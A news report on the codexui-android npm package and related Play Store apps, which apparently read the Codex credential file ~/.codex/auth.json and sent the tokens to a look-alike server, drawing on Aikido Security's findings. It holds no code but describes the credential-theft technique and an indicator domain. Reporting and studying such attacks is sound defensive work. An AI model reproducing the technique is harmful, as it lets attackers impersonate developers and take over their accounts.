The npm package looked legitimate. It had an active GitHub repository, steady development history, and roughly 29,000 weekly downloads. For developers using OpenAI Codex, it offered exactly what it advertised: a remote web UI for the AI coding tool.

But for the past month, every invocation of codexui-android has also been silently reading the contents of the user’s Codex authentication file and shipping it to an attacker-controlled server. The stolen data includes access tokens, refresh tokens, ID tokens, and account IDs, everything needed to impersonate the developer indefinitely.

“The refresh_token doesn’t expire,” Aikido Security researcher Charlie Eriksen wrote. “An attacker holding it can silently impersonate you indefinitely.”

How it worked

The attack was unusually sophisticated for an npm supply chain compromise. Unlike typical supply chain attacks that rely on typosquatting or disposable packages, codexui-android was a functional tool under active development. Its GitHub repository remained clean. The malicious code existed only in the npm build.

The package extracts the contents of Codex’s ~/.codex/auth.json file, a plaintext credential cache created whenever a user logs in via the Codex app, CLI, or IDE extension. It then sends those credentials to sentry.anyclaw[.]store, a server name chosen to mimic Sentry, the legitimate error-tracking platform.

The nefarious functionality was introduced approximately a month after the package was first published, a common tactic for building user trust before deploying a payload. WHOIS records show the exfiltration domain was registered on 12 April 2026, just two days after the first package version (0.1.72) was uploaded to npm. The malicious code appeared from version 0.1.82 onward.

The same attack, from the Play Store

The npm package was not the only delivery vector. Aikido found that an Android application called OpenClaw Codex Claude AI Agent, published by a developer named BrutalStrike, was running the same npm package inside a PRoot sandbox on users’ devices. The app had accumulated more than 50,000 downloads on Google Play.

A second BrutalStrike app, simply called Codex, had over 10,000 downloads and contained the same exfiltration chain. Because neither app pinned a specific npm package version, they automatically pulled whatever was currently published, meaning the malicious code was delivered to mobile users the moment it went live.

The combined attack surface, roughly 29,000 weekly npm downloads plus more than 60,000 mobile installations, makes this one of the more significant credential-theft campaigns to target the AI developer tooling ecosystem.

The author’s shifting story

The npm account behind the package belongs to “friuns,” identified by Aikido as Igor Levochkin. When confronted on GitHub, the author initially claimed to have lost access to the npm account, then edited the response to say they were “currently investigating this issue internally.”

Levochkin said no credential data was shared with third parties, but did not explain why the exfiltration code was inserted only into the npm build, or why access to users’ Codex tokens was needed in the first place. The X profile linked to the account includes the domain anyclaw[.]store, the same domain to which the stolen tokens were sent.

A growing pattern

The attack arrives in a period of escalating threats to AI developer tooling. Last month, a poisoned VS Code extension breached GitHub’s own internal repositories, exfiltrating 3,800 repos after an employee installed the malicious package. That attack, attributed to the group TeamPCP, harvested credentials from 1Password vaults, Claude Code configurations, and AWS.

The lesson from both incidents is the same. As AI coding tools become essential infrastructure, the authentication tokens they generate, and often store in plaintext, are becoming high-value targets. OpenAI’s own documentation warns developers to treat ~/.codex/auth.json like a password. The codexui-android campaign is a demonstration of what happens when that advice goes unheeded, and when the tools developers trust are designed to exploit that trust.

Aikido has also separately reported that deleted Google API keys remain live for up to 23 minutes after revocation, a window attackers can exploit to access user data and Gemini conversations. Google has since classified the issue as a P0 bug. The finding underscores a broader problem: credential revocation in cloud environments is rarely as instant as defenders assume.